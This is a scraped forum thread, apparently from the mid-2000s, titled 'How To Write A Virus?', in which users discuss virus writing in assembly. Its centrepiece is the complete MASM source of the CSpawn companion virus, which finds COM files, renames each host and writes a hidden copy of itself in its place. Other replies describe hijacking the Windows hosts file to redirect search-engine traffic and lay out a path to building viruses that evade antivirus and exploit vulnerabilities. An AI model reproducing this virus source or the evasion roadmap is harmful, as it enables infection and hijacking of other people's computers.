| | I know assembly language a bit. I heard from somewhere that ASM can be used in virus writing. So i would like to read something about the concepts of virus making. Have anyone here already had an experience in this ?  |
|
|
|
Overide How To Write A Virus ? The best thing, to have any effective virus is, learn how to overide TCP/IP Packets und manipulate Antivirus Autoupdate! It is just a mater of your speed.
And I am trying to learn how to prevent people from learning how to create viruses. A lot of problems already arised from people doing mistakes when creating a virus.
I don't think you'll get much information here since this is in direct violation with our TOS. I'm not sure but probably the admins will close/delete your post. Please don't do this anymore.
-=jeroen=- QUOTE(warbird @ Dec 31 2005, 05:51 PM) I don't think you'll get much information here since this is in direct violation with our TOS. I'm not sure but probably the admins will close/delete your post. Please don't do this anymore. -=jeroen=-  Sorry then, i didn't know anything about this  I came to this forum from russian programming forums. There is a freedom about this. Even CS students write viruses while practising programming. I just want this for education not for destruction 
Yea it can be educational probably, but still you'd probably have better luck looking at forums where virus creation and the more dark side of programming are the common element.
Personally I've yet to program anything even virus-esque... except a couple fork() bombs that I tricked people into using but those were more of a nuisance and non-self replicating then anything haha... 
It was extremelly simple, cause I made it in QBasic, but it did the job. These sorts of "viruses" are easy to make, but the user must be really naive to actually start them.For example, my so-called virus did the following. When started, it changed a windows file called "hosts". If you put CODE 256.256.256.256 www.google.com It will tako you to the mentioned ip address when you type www.google.com in your browser. I put my web site's IP address and some popular search engine's urls. I also made a program that returned everything back to normal. It is a nice program, but works only with WinXP installed on C: (I hade only the basic programming knowledge). You see, even with the most simple programming languages you can make something good. This is not really a virus. Hope I didn't break any rules 
As i know virus is a program that can copy itself and always stays in memory :-)
Ok then, this is just a program that plays with your computer.
On the other hand, think about a program like mine which is always running in the background and does the ip thing with any web site the user goes to. Now that would be nice. You want to google smth You go to google You google it and go to a result Then you wanna google again You type www.google.com - and it takes you to a completely different web site! Nice!
We'd a similar thread discussing some technical aspects of hacking quite sometime back. I let the thread go on with a minor warning that NO POTENTIALLY HARMFUL information is discussed here. You guys are all responsible people and know where to draw the line. So I won't close the thread but let it go on, like I did before. But any signs of deviating from that thin line - will result in sudden death of this thread
 There's a that lot you can discuss about authoring a virus - without bringing in the harmful codes and associated stuff into the discussion. Latest Entries
Overide
How To Write A Virus ? The best thing, to have any effective virus is, learn how to overide TCP/IP Packets und manipulate Antivirus Autoupdate! It is just a mater of your speed. QUOTE(xboxrulz @ Jul 16 2008, 02:49 AM) this file looks like it can only work on DOS but not Windows. xboxrulz Yes it does, but the point is how it actually works, then you can easily change it to work on windows ..
Here is an example of a primitive virus i got from some book.
Its call the companion virus ,, It changes the name of a *.com file to *.con file ,, then names it self *.com . When it excecutes it searchs for com files in directory to infect , then it starts the original file ( which is now called *.con ) and terminates The SPAWNR Virus Listing The following virus can be assembled into a COM file by MASM, TASM or A86 and executed directly. ;The CSpawn virus is a simple companion virus to illustrate how a companion ;virus works. ; ;© 1994 American Eagle Publications, Inc. All Rights Reserved! .model tiny .code org 0100h CSpawn: mov sp,OFFSET FINISH + 100H ;Change top of stack mov ah,4AH ;DOS resize memory fctn mov bx,sp mov cl,4 shr bx,cl inc bx ;BX=# of para to keep int 21H mov bx,2CH ;set up EXEC param block mov ax,[bx] mov WORD PTR [PARAM_BLK],ax ;environment segment mov ax,cs mov WORD PTR [PARAM_BLK+4],ax ;@ of parameter string mov WORD PTR [PARAM_BLK+8],ax ;@ of FCB1 mov WORD PTR [PARAM_BLK+12],ax ;@ of FCB2 mov dx,OFFSET REAL_NAME ;prep to EXEC 46 The Giant Black Book of Computer Viruses mov bx,OFFSET PARAM_BLK mov ax,4B00H int 21H ;execute host cli mov bx,ax ;save return code here mov ax,cs ;AX holds code segment mov ss,ax ;restore stack first mov sp,(FINISH - CSpawn) + 200H sti push bx mov ds,ax ;Restore data segment mov es,ax ;Restore extra segment mov ah,1AH ;DOS set DTA function mov dx,80H ;put DTA at offset 80H int 21H call FIND_FILES ;Find and infect files pop ax ;AL holds return value mov ah,4CH ;DOS terminate function int 21H ;bye-bye ;The following routine searches for COM files and infects them FIND_FILES: mov dx,OFFSET COM_MASK ;search for COM files mov ah,4EH ;DOS find first file function xor cx,cx ;CX holds all file attributes FIND_LOOP: int 21H jc FIND_DONE ;Exit if no files found call INFECT_FILE ;Infect the file! mov ah,4FH ;DOS find next file function jmp FIND_LOOP ;Try finding another file FIND_DONE: ret ;Return to caller COM_MASK db ’*.COM’,0 ;COM file search mask ;This routine infects the file specified in the DTA. INFECT_FILE: mov si,9EH ;DTA + 1EH mov di,OFFSET REAL_NAME ;DI points to new name INF_LOOP: lodsb ;Load a character stosb ;and save it in buffer or al,al ;Is it a NULL? jnz INF_LOOP ;If so then leave the loop mov WORD PTR [di-2],’N’ ;change name to CON & add 0 mov dx,9EH ;DTA + 1EH mov di,OFFSET REAL_NAME mov ah,56H ;rename original file int 21H jc INF_EXIT ;if can’t rename, already done mov ah,3CH ;DOS create file function mov cx,2 ;set hidden attribute int 21H mov bx,ax ;BX holds file handle mov ah,40H ;DOS write to file function mov cx,FINISH - CSpawn ;CX holds virus length mov dx,OFFSET CSpawn ;DX points to CSpawn of virus int 21H mov ah,3EH ;DOS close file function int 21H INF_EXIT: ret REAL_NAME db 13 dup (?) ;Name of host to execute Companion Viruses 47 ;DOS EXEC function parameter block PARAM_BLK DW ? ;environment segment DD 80H ;@ of command line DD 5CH ;@ of first FCB DD 6CH ;@ of second FCB FINISH: end CSpawn
How to write a virus ... interesting
Assuming that you only learned 16xbit assembly using turbo or whatever, on a DOS emulator. Well first of all u'll have to learn Windows programming, you no longer use inturrups but you use kernel function calls. Then u'll need to get familiar with a 32xbit assebler such as MASM ( although you could write a virus with C but it wont be as effective as assembly ) There is an excellent tutorial about using MASM here http://win32assembly.online.fr/tutorials.html You'll also need to study how operating systems work, and how it handles memory, disk space ... and soforth After that, study how an antivirus works - then you can Search for "Anti-AntiVirus techniques" Then you'll need to learn about different software vulnurabilities, and how to exploit them, different file formats that your virus will work on ( mainly EXEs and DLLs ) Then you'll want to read about different viral techniques that where used before , boot-sector , memory-residence, device driver viruses .... ect One last hint ,, search for this name "Mark Ludwig" it should get you started.After you've finished with all that u'll know that there is no use to write a virus as you can do alot more better stuff with what you've learned A good virus is not the one that causes more damage, but the one that can ruplicate it self without getting caught. I've heard recently that they are beggining to use viruses to fix some software valnurabilities, the virus would spread from one place to another fixing the security holes.
Recent Queries:-
Keywords : virus
|
|
 How To Write A Virus ? |
| ADD REPLY / Got an Opinion! | a humble request :-) | RAPID SEARCH! | Free Hosting | [X] |
|
Express your Opinions, Thoughts or Contribute your information that might help someone here. Ask your Doubts & Queries to get answers.. "Together, We enlight each other!" |
Register FREE for AD-FREE forum, Create your own topics, Ask Questions, track topics, setup subscriptions & notifications and Get a Free Website w/ Email and FTP. | 500MB Space *No Ads*, CPanel, FTP, PHP, MySQL, EMails - 100% FREE |
|